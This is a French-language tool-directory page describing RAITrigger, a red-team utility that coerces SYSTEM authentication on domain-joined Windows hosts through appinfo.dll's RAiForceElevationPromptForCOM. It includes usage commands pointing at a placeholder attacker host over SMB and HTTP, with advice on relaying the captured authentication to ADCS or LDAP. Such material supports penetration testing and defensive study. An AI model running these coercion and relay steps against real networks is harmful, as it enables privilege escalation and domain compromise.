Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
RAITrigger — Local SYSTEM auth trigger for relaying | Kitploit
Outils/GitHubGitHub/rteccybersec/raitrigger
Privilege EscalationExploitationLateral MovementAuthenticationRed Teaming
GitHubrteccybersec/raitrigger

RAITrigger

Local SYSTEM auth trigger for relaying

Voir le dépôt
17325il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

RAITrigger

La fonction RPC RAiForceElevationPromptForCOM de la bibliothèque appinfo.dll permet une contrainte SYSTEM. Cela ne fonctionne que sur les systèmes joints à un domaine. Il s'avère que cette fonction peut être appelée par tout utilisateur à faibles privilèges (non pas pour lancer un processus) mais pour déclencher une authentification SYSTEM vers un emplacement arbitraire. Cela est dû au fait que CreateFileW est appelée en tant que SYSTEM vers l'emplacement du premier paramètre d'entrée :



Comme l'utilisateur à faibles privilèges est toujours impersonné, cela ne peut pas être utilisé comme déclencheur Potato pour élever les privilèges de SEImpersonate à SYSTEM :



Mais cela peut être utilisé pour demander un certificat de compte machine auprès d'ADCS lorsque l'inscription web est activée avec l'authentification SMB entrante. Ou cela peut être utilisé pour une LPE avec relais vers LDAP - lorsque la signature LDAP n'est pas activée.

Pour déclencher l'authentification SMB :

root@kitploit:~
[*] RAITrigger.exe \\attackerip\test\test.exe

Pour déclencher l'authentification HTTP (le service WebClient doit être activé) :

root@kitploit:~
[*] RAITrigger.exe \\hostname@80\test\test.exe

L'authentification HTTP n'est déclenchée que vers les systèmes de la zone intranet de confiance, vous devrez donc créer un enregistrement ADIDNS pour votre IP Kali ou être dans le même sous-réseau et utiliser par ex. Responder. N'utilisez jamais le FQDN complet, seulement le nom d'hôte.

Appeler cette fonction à distance (même avec un administrateur local) conduit à rpc_access_denied, ce n'est donc pas une alternative à par ex. PetitPotam ou similaire :



Améliorations possibles

  • La bibliothèque NtApiDotNet est énorme. L'utilisation d'octets MIDL peut réduire considérablement la taille de l'assembly, similaire à SharpSystemTriggers

Crédits

  • https://github.com/warpnet/MS-RPC-Fuzzer
Télécharger l’outil